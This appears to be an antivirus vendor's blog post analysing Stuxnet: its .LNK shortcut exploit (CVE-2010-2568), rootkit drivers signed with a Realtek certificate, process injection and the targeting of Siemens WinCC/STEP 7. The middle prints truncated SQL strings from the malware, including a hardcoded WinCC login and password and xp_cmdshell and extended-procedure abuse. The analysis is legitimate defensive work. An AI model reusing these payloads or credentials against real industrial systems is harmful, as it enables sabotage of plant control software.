There have been quite a few security incident related to usb/flash drives and autorun behaviors. Since thee usage and portability of such vectors are advantageous to users, it was just a matter of time to be exploited by malware authors.
A new threat, recently discovered, is getting some attention and we at Emsisoft wanted to make sure users are aware of the same and also know more than just what it is. The threat is detected by Emsisoft Anti-Malware as Stuxnet, and also goes by TmpHider detected by some other vendors.
The malware has a quite few detections already and as reported by VirusBlokAda, the propagation of the malware makes it different than already prevalent drive and autorun based variants.Stuxnet spread through flash drive, does not require user interaction at all unlike other malwares which uses autorun feature from the same drives. The malware uses created .LNK files to carry on its execution. Emsisoft Anti-Malware detects the exploit .LNK file as Exploit.LNK.CVE-2010-2568.
The following files have been seen to be present in an infected flash disk
- Copy of Shortcut to .lnk
- Copy of Copy of Shortcut to .lnk
- Copy of Copy of Copy of Shortcut to .lnk
- Copy of Copy of Copy of Copy of Shortcut to .lnk
Once the user opens the flash drive in Windows Explorer, and Explorer displays the icon of the shortcut, the malware automatically run the malicious files, namely the .TMP files. The consecutive incidents happen without any user interaction or intervention.
Let us dig deep into the malicious events and binaries. ~wtr4141.tmp and ~wtr4132.tmp files are actually DLLs which get loaded into the memory. The malware then extracts two .SYS files named mrxcls.sys and mrxnet.sys, which are kernel drivers responsible for hooking and hide the related malicious files. Thus, soon after execution of the malware, the files do not remain visible to naked eye.Also interestingly, if we check the properties of the .SYS files they are “digitally signed” with “Realtek Semiconductor Corp.”.
The kernel drivers get installed without any notification from Windows as Windows thinks the files are trusted based on digital signatures. Verisign as of now has revoked the said certificates and also taken necessary steps to make sure the malware won’t be able to run smoothly with fake certificate.
Microsoft has explained that they are still investifating and working on an update to address this vulnerability (CVE-2010-2568). The report does mention that even completely patched Windows 7 32 bit or 64 bit is affected by this vulnerability. The following is the complete list of affected versions of Windows system.
Stuxnet goes on to inject malicious files into the processes services.exe and svchost.exe. On infected processes one can see the module named KERNEL32.DLL.ASLR.XXXXXX. The malware creates the following in an infected machine.
Analysis done in our lab revealed lots of interesting strings
declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';ex
declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set @e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(s
The mentioned strings are assumed to belong to SIMATIC WinCC and SIMATIC Siemens STEP 7, which are popular softwares used in industrial processes. The malware is supposedly aimed at attacking such systems. Another interesting fact is that countries most widely affected by this malware are Iran, Indonesia and India.
- Image courtesy Microsoft Threat Research and Response Blog
Microsoft has released a workaround until a patch is released which can be found here http://support.microsoft.com/kb/2286198#FixItForMe. Do update your respective antivirus system and make sure to scan any external device before using it. We at Emsisoft are constantly working hard to remain ahead as we will always be.